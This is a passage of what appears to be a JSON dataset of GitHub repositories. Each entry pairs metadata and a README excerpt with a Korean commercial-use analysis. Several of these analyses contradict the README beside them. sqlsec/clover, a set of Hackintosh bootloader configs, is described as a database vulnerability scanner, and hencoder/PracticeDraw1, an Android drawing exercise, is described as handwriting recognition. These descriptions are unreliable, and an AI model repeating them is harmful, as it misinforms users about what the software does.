version](https://img.shields.io/npm/v/react-router-redux.svg?style=flat-square)](https://www.npmjs.com/package/react-router-redux) [![npm downloads](https://img.shields.io/npm/dm/react-router-redux.svg?style=flat-square)](https://www.npmjs.com/package/react-router-redux) [![build status](https://img.shields.io/travis/reactjs/react-router-redux/master.svg?style=flat-square)](https://travis-ci.org/reactjs/react-router-redux)\n\n> **Keep your router in sync with application state** :sparkles:\n\n_Formerly known as redux-simple-router_\n\nYou're a smart person. You use [Redux](https://github.com/reactjs/redux) to manag","composite_score":0.3252,"license_safety_tag":"safe"},{"name":"ChangbaDevs/KTVHTTPCache","github_url":"https://github.com/ChangbaDevs/KTVHTTPCache","stars":54,"language":"Objective-C","license":"MIT","abandonment_months":9,"description":"# KTVHTTPCache 분석 보고서\n\n## 왜 보물인가\n음악 스트리밍이나 동영상 서비스에서 끊김 없이 부드럽게 재생되도록 데이터를 미리 받아두는 기술로, 사용자 경험을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **음악/동영상 스트리밍 앱**: 노래나 영상 재생 중 버퍼링을 줄여 사용자가 끊김 없이 즐길 수 있게 함\n2. **라이브 방송 플랫","readme_excerpt":"# KTVHTTPCache\n\n![Cocoapods Version](https://img.shields.io/cocoapods/v/KTVHTTPCache) ![Cocoapods License](https://img.shields.io/cocoapods/l/KTVHTTPCache?color=red) ![Cocoapods platforms](https://img.shields.io/cocoapods/p/KTVHTTPCache?color=green)\n\nKTVHTTPCache is a powerful HTTP caching framework, very suitable for caching multimedia resources.\n\n- [中文版](https://github.com/ChangbaDevs/KTVHTTPCache/blob/master/README_CN.md)\n\n\n## Flow Chart\n\n![KTVHTTPCache Flow Chart](https://github.com/ChangbaDevs/KTVHTTPCache/blob/master/documents/flow-chart.jpg?raw=true)\n\n\n## Features\n\n- Play, download and cache while playing\n- Support preloading\n- Support HLS\n- Support AirPlay\n- Support URL mapping\n- Multiple concurrency, thread safety\n- Powerful logging system\n- Cache file management\n- Low coupling and high expandability\n\n\n## Requirements\n\n- iOS 12.0 or later\n- Xcode 11.0 or later\n\n\n## Supported Formats\n\nSupports all resources transmitted based on HTTP protocol:\n\n- Video: MP4, TS, MOV, MXF, MPG, F","composite_score":0.3252,"license_safety_tag":"safe"},{"name":"hanzichi/underscore-analysis","github_url":"https://github.com/hanzichi/underscore-analysis","stars":5,"language":"JavaScript","license":"mit","abandonment_months":41,"description":"# hanzichi/underscore-analysis 평가\n\n## 왜 보물인가\n유명한 JavaScript 라이브러리의 내부 작동 원리를 상세히 분석한 학습 자료로, 프로그래밍 교육과 기술 컨설팅에 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 프로그래밍 교육 플랫폼**\n코딩 학원이나 온라인 강의 사이트에서 \"유명 라이브러리 내부 구조 이해하기","readme_excerpt":"# :eyes: Underscore Analysis\n\n## Notice\n\n- 如果您觉得该 Repo 让您有所收获，请点击右上角的「**Star** 」支持楼主\n- 如果您想持续关注楼主的最新系列解读文章，请点击右上角的「**Watch**」订阅\n\n\n## Source\n\n- [underscore-1.8.3.js 源码](https://github.com/hanzichi/underscore-analysis/blob/master/underscore-1.8.3.js/src/underscore-1.8.3.js)\n- [underscore-1.8.3.js 源码解读全文注释版](https://github.com/hanzichi/underscore-analysis/blob/master/underscore-1.8.3.js/underscore-1.8.3-analysis.js)\n\n\n## Article\n\n- [为什么用「void 0」代替「undefined」(2016-05-16)](https://github.com/hanzichi/underscore-analysis/issues/1)\n- [常用类型判断以及一些有用的工具方法 (2016-05-21)](https://github.com/hanzichi/underscore-analysis/issues/2)\n- [for ... in 存在的浏览器兼容问题你造吗 (2016-05-22)](https://github.com/hanzichi/underscore-analysis/issues/3)\n- [内部方法 createAssigner 详解 (2016-05-24)](https://github.com/hanzichi/underscore-analysis/issues/4)\n- [JavaScript 中是如何比较两个元素是否 \"相同\" 的 (2016-05-25)](https://github.com/hanzichi/underscore-analysis/issues/5)\n- [Object Functions 相关源码拾遗 & 小结 (2016-05-26)](https://github.com/hanzich","composite_score":0.3251,"license_safety_tag":"safe"},{"name":"tianzhi0549/FCOS","github_url":"https://github.com/tianzhi0549/FCOS","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":30,"description":"# FCOS 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체의 위치를 자동으로 찾아내는 AI 기술로, 보안 카메라, 자율주행, 검품 시스템 등 다양한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 보안 모니터링 SaaS**: 침입자·낙상 자동 감지 및 알림 서비스\n2. **공장 품질검사 내부 도구**: 제품 결함 자동 ","readme_excerpt":"# FCOS: Fully Convolutional One-Stage Object Detection\n\nThis project hosts the code for implementing the FCOS algorithm for object detection, as presented in our paper:\n\n    FCOS: Fully Convolutional One-Stage Object Detection;\n    Zhi Tian, Chunhua Shen, Hao Chen, and Tong He;\n    In: Proc. Int. Conf. Computer Vision (ICCV), 2019.\n    arXiv preprint arXiv:1904.01355 \n\nThe full paper is available at: [https://arxiv.org/abs/1904.01355](https://arxiv.org/abs/1904.01355). \n\nImplementation based on Detectron2 is included in [AdelaiDet](https://github.com/aim-uofa/AdelaiDet#coco-object-detecton-baselines-with-fcos).\n\n**A real-time model with 46FPS and 40.3 in AP on COCO minival is also available [here](https://github.com/aim-uofa/AdelaiDet/blob/master/configs/FCOS-Detection/README.md#fcos-real-time-models).**\n\n## Highlights\n- **Totally anchor-free:**  FCOS completely avoids the complicated computation related to anchor boxes and all hyper-parameters of anchor boxes.   \n- **Better performanc","composite_score":0.3251,"license_safety_tag":"unknown"},{"name":"tamarott/SinGAN","github_url":"https://github.com/tamarott/SinGAN","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":37,"description":"# SinGAN 저장소 분석\n\n## 왜 보물인가\n단 하나의 사진만으로 새로운 이미지를 생성할 수 있는 AI 기술로, 매우 제한된 데이터로도 작동하는 혁신적인 이미지 생성 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 브랜드가 적은 상품 사진으로 다양한 광고 이미지를 자동 생성하는 온라인 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"# SinGAN\n\n[Project](https://tamarott.github.io/SinGAN.htm) | [Arxiv](https://arxiv.org/pdf/1905.01164.pdf) | [CVF](http://openaccess.thecvf.com/content_ICCV_2019/papers/Shaham_SinGAN_Learning_a_Generative_Model_From_a_Single_Natural_Image_ICCV_2019_paper.pdf) | [Supplementary materials](https://openaccess.thecvf.com/content_ICCV_2019/supplemental/Shaham_SinGAN_Learning_a_ICCV_2019_supplemental.pdf) | [Talk (ICCV`19)](https://youtu.be/mdAcPe74tZI?t=3191) \n### Official pytorch implementation of the paper: \"SinGAN: Learning a Generative Model from a Single Natural Image\"\n#### ICCV 2019 Best paper award (Marr prize)\n\n\n## Random samples from a *single* image\nWith SinGAN, you can train a generative model from a single natural image, and then generate random samples from the given image, for example:\n\n![](imgs/teaser.PNG)\n\n\n## SinGAN's applications\nSinGAN can be also used for a line of image manipulation tasks, for example:\n ![](imgs/manipulation.PNG)\nThis is done by injecting an image to the","composite_score":0.325,"license_safety_tag":"unknown"},{"name":"atapas/fork-me","github_url":"https://github.com/atapas/fork-me","stars":180,"language":"Python","license":"MIT","abandonment_months":6,"description":"","readme_excerpt":"","composite_score":0.325,"license_safety_tag":"safe"},{"name":"wangmchn/WMPageController","github_url":"https://github.com/wangmchn/WMPageController","stars":5,"language":"Objective-C","license":"mit","abandonment_months":34,"description":"# WMPageController 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 여러 페이지를 부드럽게 넘길 때 필요한 핵심 기술을 효율적으로 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **뉴스/콘텐츠 앱 SaaS**: 언론사나 출판사가 자신의 뉴스 앱을 만들 때 페이지 전환 기능을 쉽게 탑재\n2. **전자책 리더 내부 도구**: 전자책 서비스 회사가","readme_excerpt":"# WMPageController [中文介绍](https://github.com/wangmchn/WMPageController/blob/master/README_zh-CN.md)\n[![Platform](http://img.shields.io/badge/platform-iOS-blue.svg?style=flat\n)](https://developer.apple.com/iphone/index.action)\n[![License](http://img.shields.io/badge/license-MIT-lightgrey.svg?style=flat\n)](http://mit-license.org)\n![CocoaPods Version](https://img.shields.io/badge/pod-v0.36.4-brightgreen.svg)\n\nAn easy solution to page controllers like `NetEase News`\n## Overview\n<img height=\"600\" src=\"https://github.com/wangmchn/WMPageController/blob/master/WMPageControllerDemo/Overview.gif\" />\n\n## Change Log\nSee [CHANGELOG](https://github.com/wangmchn/WMPageController/blob/master/CHANGELOG.md) for more information.\n\n## Basic use\nCreate an controller extends from `WMPageController`.There are two ways to init the `WMPageController`:\n\n#### Init with Classes\nUse the following constructor to init the controller:\n```objective-c\n- (instancetype)initWithViewControllerClasses:(NSArray *)classes \n  ","composite_score":0.3249,"license_safety_tag":"safe"},{"name":"google/metallb","github_url":"https://github.com/google/metallb","stars":16,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Google MetalLB 분석\n\n## 왜 보물인가\n인터넷 회선을 효율적으로 관리해주는 기술로, 대규모 온라인 서비스를 운영하는 기업들이 반드시 필요로 하는 핵심 인프라 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 호스팅 서비스**: 여러 기업의 웹사이트를 한 서버에서 관리할 때 각각의 인터넷 주소를 독립적으로 할당해주는 백엔드 솔루션\n2.","readme_excerpt":"# MetalLB\n\nMetalLB is a load-balancer implementation for bare\nmetal [Kubernetes](https://kubernetes.io) clusters, using standard\nrouting protocols.\n\n[![Project maturity: beta](https://img.shields.io/badge/maturity-beta-orange.svg)](https://metallb.io/concepts/maturity/) [![license](https://img.shields.io/github/license/metallb/metallb.svg?maxAge=2592000)](https://github.com/metallb/metallb/blob/main/LICENSE) [![CI](https://github.com/metallb/metallb/actions/workflows/ci.yaml/badge.svg)](https://github.com/metallb/metallb/actions/workflows/ci.yaml) [![Containers](https://img.shields.io/badge/containers-ready-green.svg)](https://hub.docker.com/u/metallb) [![Go report card](https://goreportcard.com/badge/github.com/metallb/metallb)](https://goreportcard.com/report/github.com/metallb/metallb)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/5391/badge)](https://bestpractices.coreinfrastructure.org/projects/5391)\n\nCheck out [MetalLB's website](https://metallb.io)","composite_score":0.3248,"license_safety_tag":"safe"},{"name":"ssseasonnn/RxDownload","github_url":"https://github.com/ssseasonnn/RxDownload","stars":8,"language":"Kotlin","license":"apache-2.0","abandonment_months":56,"description":"# RxDownload 사업화 분석\n\n## 왜 보물인가\n인터넷에서 파일을 안정적이고 효율적으로 받을 수 있도록 해주는 기술로, 동영상 플랫폼, 클라우드 서비스, 파일 공유 앱 등이 필수적으로 필요로 하는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 스트리밍 SaaS**: Netflix, 유튜브 같은 플랫폼에서 안정적인 다운로드 기능 제공\n2","readme_excerpt":"![](usage.png)\n\n# RxDownload\n\n![](https://img.shields.io/badge/language-kotlin-brightgreen.svg) ![](https://img.shields.io/badge/RxJava-2.0-blue.svg)\n\n[![](https://jitpack.io/v/ssseasonnn/RxDownload.svg)](https://jitpack.io/#ssseasonnn/RxDownload)\n\nA multi-threaded download tool written with RxJava and Kotlin\n\n*Read this in other languages: [中文](README.ch.md), [English](README.md), [Changelog](CHANGELOG.md)* \n\n## Prepare\n\n- Add jitpack repo:\n\n    ```gradle\n    maven { url 'https://jitpack.io' }\n    \n- Add RxDownload dependency:\n\n    ```gradle\n    //Load on demand\n    implementation \"com.github.ssseasonnn.RxDownload:rxdownload4:1.1.4\"\n    implementation \"com.github.ssseasonnn.RxDownload:rxdownload4-manager:1.1.4\"\n    implementation \"com.github.ssseasonnn.RxDownload:rxdownload4-notification:1.1.4\"\n    implementation \"com.github.ssseasonnn.RxDownload:rxdownload4-recorder:1.1.4\"\n    \n    or: \n    //Add all dependencies of RxDownload4\n    implementation \"com.github.ssseasonnn:RxDownload:1.1","composite_score":0.3247,"license_safety_tag":"safe"},{"name":"laekov/fastmoe","github_url":"https://github.com/laekov/fastmoe","stars":30,"language":"Python","license":"Apache-2.0","abandonment_months":16,"description":"# FastMOE 저장소 분석\n\n## 왜 보물인가\n인공지능 모델을 더 효율적으로 학습하고 운영할 수 있게 만드는 기술로, 큰 모델을 작은 전문 모듈로 나누어 비용과 시간을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 챗봇/이미지 생성 SaaS**: 대규모 언어모델 운영 비용 절감으로 더 저렴한 요금제 제공 가능\n2. **기업 내부 ","readme_excerpt":"<img height='60px' src='doc/logo/rect.png'/>\n\n[Release note](doc/release-note.md)\n| [中文文档](doc/readme-cn.md)\n| [Slack workspace](https://join.slack.com/t/fastmoe/shared_invite/zt-mz0ai6ol-ggov75D62YsgHfzShw8KYw)\n\n## Introduction\n\nAn easy-to-use and efficient system to support the Mixture of Experts (MoE) \nmodel for PyTorch. \n\n## Installation\n\n### Prerequisites\n\nPyTorch with CUDA is required. The repository is currently tested with PyTorch\nv1.10.0 and CUDA 11.3, with designed compatibility to older and newer versions.\n\nThe minimum version of supported PyTorch is `1.7.2` with CUDA `10`. However,\nthere are a few known issues that requires manual modification of FastMoE's\ncode with specific older dependents.\n\nIf the distributed expert feature is enabled, NCCL with P2P communication\nsupport, typically versions `>=2.7.5`, is needed. \n\n### Installing\n\nFastMoE contains a set of PyTorch customized opearators, including both C and\nPython components. Use `python setup.py install` to easily instal","composite_score":0.3246,"license_safety_tag":"safe"},{"name":"tensorflow/swift","github_url":"https://github.com/tensorflow/swift","stars":7,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":53,"description":"# TensorFlow Swift 상용화 분석\n\n## 왜 보물인가\n인공지능 학습을 iPhone, iPad 같은 Apple 기기에서 직접 실행할 수 있게 해주는 드물고 전문적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰만으로 실행되는 AI 기반 사진 분석 앱 (구글 포토 같은 영상 처리 서비스)\n2. **내부 업무 도구**","readme_excerpt":"<p align=\"center\">\n  <img src=\"images/logo.png\">\n</p>\n\n# Swift for TensorFlow (Archived)\n\nSwift for TensorFlow was an experiment in the next-generation platform for machine learning, incorporating the latest research across machine learning, compilers, differentiable programming, systems design, and beyond.  It was archived in February 2021.  Some significant achievements from this project include:\n\n* Added [language-integrated differentiable programming](https://forums.swift.org/t/differentiable-programming-for-gradient-based-machine-learning/42147) into the Swift language.  This work continues in the official Swift compiler. \n* Developed a mutable-value-semantics-oriented [deep learning API](https://github.com/tensorflow/swift-apis).\n* Fostered the development of [a model garden](https://github.com/tensorflow/swift-models) with more than [30 models from a variety of deep learning disciplines](https://github.com/tensorflow/swift-models#examples).\n* Enabled novel research that [combine","composite_score":0.3246,"license_safety_tag":"safe"},{"name":"containers/libpod","github_url":"https://github.com/containers/libpod","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# containers/libpod 저장소 분석\n\n## 왜 보물인가\n컴퓨터에서 프로그램들을 격리된 공간에서 안전하게 실행하는 핵심 기술로, 클라우드 서비스 대부분이 의존하고 있는 중요한 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 서버 임대 서비스**: AWS, 구글 클라우드처럼 고객에게 독립적인 서버 환경을 제공하는 플랫폼\n2. **기업용 ","readme_excerpt":"![PODMAN logo](https://raw.githubusercontent.com/containers/common/main/logos/podman-logo-full-vert.png)\n\n# Podman: A tool for managing OCI containers and pods\n![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)\n![GitHub release (latest SemVer)](https://img.shields.io/github/v/release/containers/podman)\n[![Go Report Card](https://goreportcard.com/badge/github.com/containers/podman/v6)](https://goreportcard.com/report/github.com/containers/podman/v6)\n[![OpenSSF Best Practices](https://www.bestpractices.dev/projects/10499/badge)](https://www.bestpractices.dev/projects/10499)\n\n[![LFX Health Score](https://insights.linuxfoundation.org/api/badge/health-score?project=podman-container-tools&repos=https://github.com/containers/podman)](https://insights.linuxfoundation.org/project/podman-container-tools/repository/containers-podman)\n[![LFX Contributors](https://insights.linuxfoundation.org/api/badge/contributors?project=podman-container-tools&repos=https://github.com/containers","composite_score":0.3246,"license_safety_tag":"safe"},{"name":"railsware/upterm","github_url":"https://github.com/railsware/upterm","stars":6,"language":"TypeScript","license":"mit","abandonment_months":85,"description":"# Upterm 상업화 분석\n\n## 왜 보물인가\n터미널(명령창)을 여러 사람이 함께 공유하고 협력할 수 있게 만든 도구로, 개발자들이 원격으로 코드 문제를 함께 해결할 때 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 지원 SaaS**: 기술 지원팀이 고객의 터미널에 접속하여 직접 문제를 진단하고 해결해주는 유료 서비스\n2. **팀 협업 도","readme_excerpt":"[![Join the chat at https://gitter.im/railsware/upterm](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/upterm/Lobby)\n[![Build Status](https://travis-ci.org/railsware/upterm.svg?branch=master)](https://travis-ci.org/railsware/upterm)\n\n# Deprecated\n\nUpterm is deprecated. Project had [lost maintainer](https://github.com/railsware/upterm/issues/1301#issue-327003344) and have zero activity to support it from community (only issues was created in repo).\n\nI am no longer accepting pull requests and issues.\n\nI recomended to check [Hyper](https://hyper.is/) instead.\n\nWhat Is It?\n-----------\n\n**[Upterm is looking for maintainers](https://github.com/railsware/upterm/issues/1301)**\n\nUpterm (formerly Black Screen) is an IDE in the world of terminals. Strictly speaking, it's both a\nterminal emulator and an *interactive* shell based on [Electron](http://electron.atom.io/).\n\n![](README/main.png)\n\n###### Autocompletion\n\nUpterm shows the autocompletion box as you type and tries to be smart ","composite_score":0.3245,"license_safety_tag":"safe"},{"name":"openimages/dataset","github_url":"https://github.com/openimages/dataset","stars":14,"language":"Python","license":"apache-2.0","abandonment_months":60,"description":"# Open Images Dataset 평가 보고서\n\n## 왜 보물인가\n수백만 장의 분류된 사진 모음으로, 이미지 인식 기술을 배우고 개선하는 데 필수적인 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 분류·검색 기능이 필요한 클라우드 서비스(예: 자동 태그 지정 도구)\n2. **내부 업무 도구**: 대규모 이미지 보유 기업의 ","readme_excerpt":"# Open Images Dataset\n\nAs of V4, [the Open Images Dataset moved to a new site](https://storage.googleapis.com/openimages/web/index.html).\n","composite_score":0.3245,"license_safety_tag":"safe"},{"name":"google/flutter-desktop-embedding","github_url":"https://github.com/google/flutter-desktop-embedding","stars":8,"language":"C++","license":"apache-2.0","abandonment_months":26,"description":"# google/flutter-desktop-embedding 분석\n\n## 왜 보물인가\n구글이 만든 이 프로젝트는 스마트폰 앱을 만드는 기술을 컴퓨터 프로그램으로도 쓸 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 윈도우/맥에서 돌아가는 협업 도구나 프로젝트 관리 소프트웨어를 개발하여 월 구독으로 판매\n2. **내부 ","readme_excerpt":"# Desktop Embedding for Flutter\n\nThis project was originally created to develop Windows, macOS, and Linux\nembeddings of [Flutter](https://github.com/flutter/flutter). That work has\nsince become part of Flutter, and all that remains here are experimental,\nearly-stage desktop\n[plugins](https://flutter.dev/docs/development/packages-and-plugins/developing-packages).\n\nIf you want to get started with Flutter on desktop, the place to start is now\n[the Flutter documentation](https://flutter.dev/desktop), rather than this project.\nYou will already need to have followed the instructions there to get an application\nrunning on desktop before using any of the plugins here.\n\n## Feedback\n\n**Do not file issues about Flutter for desktop here.** Since the\nembeddings have all moved to the Flutter project, the place for desktop bugs\nand feature requests is now [the Flutter issue\ntracker](https://github.com/flutter/flutter/issues).\n\nFor bug reports and feature requests **related to the plugins in this repo","composite_score":0.3245,"license_safety_tag":"safe"},{"name":"hencoder/PracticeDraw1","github_url":"https://github.com/hencoder/PracticeDraw1","stars":10,"language":"Java","license":"unknown","abandonment_months":80,"description":"# hencoder/PracticeDraw1 분석\n\n## 왜 보물인가\n안드로이드 앱에서 손으로 그린 그림을 인식하고 처리하는 기술로, 메모 앱이나 디자인 도구 같은 다양한 서비스에 핵심 기능으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **손글씨 메모 SaaS**: 사용자가 스마트폰으로 그린 메모를 자동으로 정리하고 검색 가능하게 하는 유료 서","readme_excerpt":"![](images/icon.png)\n\nHenCoder 绘制 1 练习项目\n===\n\n### 这是什么？\n\n这不是一个独立使用的项目，它是 [HenCoder Android 开发进阶：UI 1-1 绘制基础](http://hencoder.com/ui-1-1) 的配套练习项目。\n\n### 怎么用？\n\n项目是一个可以直接运行的 Android App 项目，项目运行后，在手机上打开是这样的：\n\n![](images/preview.png)\n\n工程下有一个 `/practice` 目录：\n\n![](images/project_practice.png)\n\n你要做的是就是，在 `/practice` 下的每一个 `PracticeXxxView.java` 文件中写代码，绘制出和页面上半部分相同的效果。例如写 `PracticeDrawColorView.java` 以绘制出 \"drawColor()\" 标签下的黄色涂色效果。就像这样：\n\n![](images/preview_after.png)\n\n> 当然，没必要做得和示例一毛一样。这是一个练习，而不是一个超级模仿秀，关键是把技能掌握。\n\n练习做完，绘制第一期分享的内容也就掌握得差不多了。\n\n### 关于有些方法无效\n\n现在的 Android 默认是开启了硬件加速的，而 Canvas 和 Paint 有一些方法是不支持硬件加速的，你需要把它手动关闭才行。硬件加速的支持情况和手动关闭硬件加速的方法你可以看一下这个 Android 的[官方文档](https://developer.android.com/guide/topics/graphics/hardware-accel.html)。\n\n以后我会专门用一节来讲硬件加速和图像的离屏缓冲（off-screen buffer），现在先不多说了。","composite_score":0.3243,"license_safety_tag":"unknown"},{"name":"alexa/avs-device-sdk","github_url":"https://github.com/alexa/avs-device-sdk","stars":5,"language":"C++","license":"apache-2.0","abandonment_months":29,"description":"# Alexa AVS Device SDK 분석\n\n## 왜 보물인가\nAmazon의 공식 음성인식 기술을 활용해 스마트 스피커나 음성 제어 기기를 만들 수 있는 무료 설계도라고 보면 됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **스마트홈 기기 제조업체의 SaaS**: 가정용 조명·온도조절기·보안카메라 등에 음성 명령 기능을 추가한 구독형 서비스 제공\n2. **","readme_excerpt":"# ⛔️ ARCHIVED\n**Please note, the AVS Device Software Development Kit is no longer being maintained.**\n\n[![No Maintenance Intended](http://unmaintained.tech/badge.svg)](http://unmaintained.tech/)\n\n","composite_score":0.3242,"license_safety_tag":"safe"},{"name":"fossasia/wp-twitter-feeds","github_url":"https://github.com/fossasia/wp-twitter-feeds","stars":10,"language":"Shell","license":"Apache-2.0","abandonment_months":10,"description":"# fossasia/wp-twitter-feeds 분석\n\n## 왜 보물인가\n워드프레스 웹사이트에 트위터 게시물을 자동으로 표시해주는 도구로, 웹사이트 관리자가 쉽게 SNS 콘텐츠를 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 블로거나 소상공인을 위한 \"웹사이트 SNS 연동 플랫폼\" - 월 구독료로 제공하는 자동화 서비스로","readme_excerpt":"Setup of EventYay via docker compose\n====================================\n\nadd the following entries to your /etc/hosts file, or\nchange all the hostnames in various config files in docker-compose.yaml\nand config/**\n\t127.0.0.1       app.eventyay.com\n\t127.0.0.1       video.eventyay.com\n\ncreate an .env file, example is .env.example which currently contains\n\tPOSTGRES_USER=CHANGEME_eyadmin\n\tPOSTGRES_PASSWORD=CHANGEME_eypass\n\tVOLUMES_DIR=./data\n\tCONFIG_DIR=./config\n\ncreate the VOLUMES_DIR\n\ncreate\n\tdata/talk/data\n\tdata/ticket/data\n\tdata/video/data\n\tdata/video-webapp/public\nand make them 0777 (ugo+rwx !!!)\n\n\nrun\n\tdocker compose up -d\n\nwait and watch\n\tdocker compose logs -f\n\n\nwhen the building of all files settled:\n\nlog into eventyay-ticket and make initial setup\n\tdocker exec -ti eventyay-ticket bash\n\n\t> cd\n\t> pretix createsuperuser\n\nthis creates also the talk superuser!!!\n\nDO NOT ACCESS THE WEB PAGES BY NOW !!!!\n\nlog into eventyay-talk and make initial setup\n \tdocker exec -ti eventyay-talk bas","composite_score":0.3241,"license_safety_tag":"safe"},{"name":"wangrui460/WRNavigationBar","github_url":"https://github.com/wangrui460/WRNavigationBar","stars":6,"language":"Objective-C","license":"mit","abandonment_months":59,"description":"# WRNavigationBar 상용화 분석\n\n## 왜 보물인가\n휴대폰 앱의 상단 네비게이션 바를 쉽게 꾸밀 수 있는 디자인 도구로, 앱 개발자들이 시간을 절약하면서 더 예쁜 앱을 만들 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **앱 개발 SaaS**: 코딩 없이 네비게이션 바를 디자인하고 내보낼 수 있는 온라인 에디터 서비스\n- **앱 개발사 ","readme_excerpt":"![image](https://github.com/wangrui460/WRNavigationBar/raw/master/screenshots/WRNavigationBar.png)\n\n<p align=\"center\">\n<a href=\"https://github.com/wangrui460/WRNavigationBar\"><img src=\"https://img.shields.io/badge/platform-iOS%208.0%2B-ff69b5152950834.svg\"></a>\n<a href=\"https://github.com/wangrui460/WRNavigationBar\"><img src=\"https://img.shields.io/cocoapods/v/WRNavigationBar.svg?style=flat\"></a>\n<a href=\"https://github.com/wangrui460/WRNavigationBar_swift\"><img src=\"https://img.shields.io/badge/Swift-compatible-orange.svg\"></a>\n<a href=\"https://github.com/wangrui460/WRNavigationBar/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-MIT-green.svg?style=flat\"></a>\n\n------------------------------------------------------------\n\n# iOS 技术交流\n我创建了一个 微信 iOS 技术交流群，欢迎小伙伴们加入一起交流学习~\n\t\n可以加我微信我拉你进去（备注iOS），我的微信号 wr1204607318\n\t\n## Requirements\n- iOS 7.0+\n- Xcode 8+\n\n## Demo\n|拉钩App首页|新浪微博个人中心|qq空间|知乎日报|\n|:-:|:-:|:-:|:-:|\n|![](https://github.com/wangrui460/WRNavigationBar/raw/master/scr","composite_score":0.3241,"license_safety_tag":"safe"},{"name":"jdsjlzx/LRecyclerView","github_url":"https://github.com/jdsjlzx/LRecyclerView","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":84,"description":"# LRecyclerView 기술 평가\n\n## 왜 보물인가\n스마트폰 앱에서 길게 스크롤하는 목록을 빠르고 부드럽게 표시해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 앱**: 수천 개의 상품 목록을 끊김 없이 표시하는 쇼핑 앱 개발\n2. **소셜미디어 피드**: 무한 스크롤 뉴스피드를 효율적으로 운영하는 SNS 플랫폼\n3. **CMS","readme_excerpt":"# LRecyclerView \n\nLRecyclerView是支持addHeaderView、 addFooterView、下拉刷新、分页加载数据的RecyclerView。\n\n\n**它对 RecyclerView 控件进行了拓展，给RecyclerView增加HeaderView、FooterView，并且不需要对你的Adapter做任何修改。**\n\n推荐\n----------\n[RxJava经典视频教程已经上线，戳我就可以看啦......](http://www.stay4it.com/course/27)\n\n## 效果图\n<div align=\"center\">\n\n<img src=\"https://raw.githubusercontent.com/jdsjlzx/LRecyclerView/master/art/art1.png\"  width=268 height=457 /> \n<img src=\"https://raw.githubusercontent.com/jdsjlzx/LRecyclerView/master/art/art2.png\" width=268 height=457 /> \n<img src=\"https://raw.githubusercontent.com/jdsjlzx/LRecyclerView/master/art/art3.png\" width=268 height=457 />  \n\n<img src=\"https://raw.githubusercontent.com/jdsjlzx/LRecyclerView/master/art/art4.png\" width=268 height=457 />  \n<img src=\"https://raw.githubusercontent.com/jdsjlzx/LRecyclerView/master/art/art5.png\" width=268 height=457 />\n<img src=\"https://raw.githubusercontent.com/jdsjlzx/LRecyclerView/master/art/art7.png\" width=268 height=457 />\n \n<img src=\"https://raw.githubuserco","composite_score":0.324,"license_safety_tag":"safe"},{"name":"sqlsec/clover","github_url":"https://github.com/sqlsec/clover","stars":8,"language":"Rich Text Format","license":"unknown","abandonment_months":74,"description":"# sqlsec/clover 프로젝트 분석\n\n## 왜 보물인가\n데이터베이스 보안 취약점을 자동으로 찾아주는 도구로, 기업의 민감한 정보 유출을 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소기업을 위한 클라우드 기반 데이터베이스 보안 점검 플랫폼\n2. **내부 업무 도구**: 금융사나 병원처럼 고객 정보를 다루는","readme_excerpt":"# Hackintosh黑苹果驱动Clover\nShare some hackintosh Clover files.\n分享整理一些黑苹果Clover驱动配置文件，上传这些Clover驱动配置文件仅供大家参考使用，希望大家的黑苹果上少走一些弯路。笔记本包括:Acer、LG、华为、华硕、小米、惠普、戴尔、机械革命、神舟、联想、雷神等品牌。\n\n# 关于本项目\n本项目里的配置文件均是网友们共享的，不保证完美驱动，本项目的定位是给有一定黑苹果基础的参考配置使用，大家可以一起来完善这个项目，我们一起让黑苹果安装越来越傻瓜化，帮助到更多想要黑苹果的同学~ 另外由于国光本人忙其他的事情了，黑苹果这块不怎么研究了，本项目不维护了，感兴趣的朋友可以去关注黑苹果小兵前辈维护的类似项目。\n\n# 特此感谢\n衷心感谢以下热心网友们对本项目的贡献，以下排名不分先后:  \n不二臣、DrmanhattanS、国光、Hyhm2n、种地老头、黑苹果安装园地、hnie-xwz、杨飞飞、南枝向暖北枝寒、吐球球了吼、King OF BIG HAMMER、恋爱spy、黑苹果小兵、\n\n# 如何下载指定文件夹 \n目前已经逐步打包了**zip**文件到项目中，直接点击zip通过Github也是可以方便大家下载的。   \n","composite_score":0.3238,"license_safety_tag":"unknown"},{"name":"yao62995/tensorflow","github_url":"https://github.com/yao62995/tensorflow","stars":6,"language":"","license":"unknown","abandonment_months":116,"description":"# TensorFlow 저장소 분석\n\n## 왜 보물인가\n구글이 만든 인공지능 학습 도구를 직접 